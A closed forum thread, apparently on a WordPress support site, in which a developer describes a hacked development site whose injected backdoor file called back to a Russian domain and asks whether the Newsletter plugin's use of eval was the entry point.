Dangerous Plugin Used by Hackers to Corrupt Site?
-
I’m not directly saying this is true, I’m asking out of legitimate concern.
I had a site on my development server which only had this plugin installed as well as one I custom coded for a client. I noticed today that the site was hacked in which two files were added to the server.
One file (after decoding it) communicated back to moyaobuvka.ru on each page load (I suggest not visiting this website). It did two things, first, it detected whether the page load was called by Google. If so, it could inject code in to the page (possibly links for rank building, a redirect). Second, it then allowed execution of any PHP code sent to any URL as long as certain variables were set.
I, unfortunately, was unable to view the server logs as the attack came just before the logs were reset at 7am, so I can’t confirm this specifically, but I believe the point of entry was through this plugin, which makes use of the PHP eval command, known to be dangerous and highly suggested to not be used if at all possible.
I’ve looked at the code, I’m not sure how it would be possible, but seeing the eval command used in two parts of the ‘plugin.php’ file has me feeling uneasy.
The site runs 3.4.1, is not listed on any search engines, and the admin username would not be easily guessed. Again, only plugins installed are my own custom plugin which is not publicly released and Newsletter 2.5.2.6.
- The topic ‘Dangerous Plugin Used by Hackers to Corrupt Site?’ is closed to new replies.
